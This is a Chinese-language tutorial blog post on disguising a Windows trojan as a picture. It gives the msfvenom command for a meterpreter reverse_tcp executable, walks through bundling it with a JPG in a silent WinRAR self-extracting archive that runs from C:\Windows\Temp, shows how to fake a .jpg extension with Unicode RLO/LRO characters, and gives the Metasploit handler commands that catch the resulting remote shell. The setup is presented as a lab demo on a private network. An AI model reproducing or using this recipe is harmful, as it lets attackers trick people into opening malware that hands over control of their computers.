网络安全-解密WinRAR捆绑恶意程序并自动上线MSF的原理

·  阅读 92

生成伪装恶意程序的封面图标

需要安装rar压缩工具。 WinRAR官网:www.winrar.com.cn/ 下载安装即可不需要特殊配置。

msfvenom生成exe

┌──(root💀xuegod53)-[~]
└─# msfvenom  -p windows/meterpreter/reverse_tcp  LHOST=192.168.1.53 LPORT=4444 -f exe -o /var/www/html/dongman.exe
复制代码

准备一张图片

在这里插入图片描述

图片生成ico图标用于恶意程序的封面图标:www.ico51.cn/ 注:图片尺寸选最大的,也可以找一下其它的ico图标生成网站。

在这里插入图片描述

转换后会自动下载

在这里插入图片描述

捆绑恶意程序和图片并设置自动运行

选中dongman.exe和dongman.jpg添加到压缩文件。

在这里插入图片描述

勾选:创建自解压格式压缩文件

在这里插入图片描述

设置自解压选项

在这里插入图片描述

解压路径:C:\Windows\Temp 注:dongman.exe和dongman.jpg会被解压到C:\Windows\Temp

在这里插入图片描述

解压后运行dongman.exe和dongman.jpg C:\Windows\Temp\dongman.jpg C:\Windows\Temp\dongman.exe

在这里插入图片描述

静默方式解压

在这里插入图片描述

更新方式 多次解压可能会出现文件已经存在的情况,如果文件存在会询问用户。 建议选择覆盖所有文件或跳过已存在的文件。 覆盖:缺点是如果exe程序已经运行那么覆盖会失败。 跳过:如果exe文件的参数有修改跳过后则运行的还是旧版本。 建议:每次制作不要用相同的名字

在这里插入图片描述

添加刚才生成的ico图标。

在这里插入图片描述

生成后的自解压文件。

在这里插入图片描述

使用Unicode字符修改文件名后缀

重命名

在这里插入图片描述

选中文件名鼠标右键插入RLO RLO从右到左 LRO从左到右

在这里插入图片描述

插入gpj,RLO是从右到左,所以最终gpj=jpg

在这里插入图片描述

此时文件名后缀为exe.jpg,那这样还不理想,文件名部分是exe还是没什么意义

在这里插入图片描述

添加文件名 重命名,在exe前面插入Unicode控制字符LRO

在这里插入图片描述

输入文件名:动漫gpj.exe‬‬‬‬‬‬

最终效果,文件有ico图标伪装图片的缩略图,文件名后缀.jpg来伪装文件类型。 注:exe.不可以去掉

在这里插入图片描述

通过访问图片自动获取目标shell

┌──(root💀xuegod53)-[~]
└─# msfdb run     
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.1.53
msf5 exploit(multi/handler) > set LPORT 4444
msf6 exploit(multi/handler) > run
复制代码

打开动漫gpj.exe

在这里插入图片描述

图片文件自动打开

在这里插入图片描述

MSF成功上线

在这里插入图片描述

临时目录下文件也都存在。 C:\Windows\Temp

在这里插入图片描述

更多技术干货请关注公众号【学神来啦】!

分类:
开发工具
标签:
收藏成功!
已添加到「」, 点击更改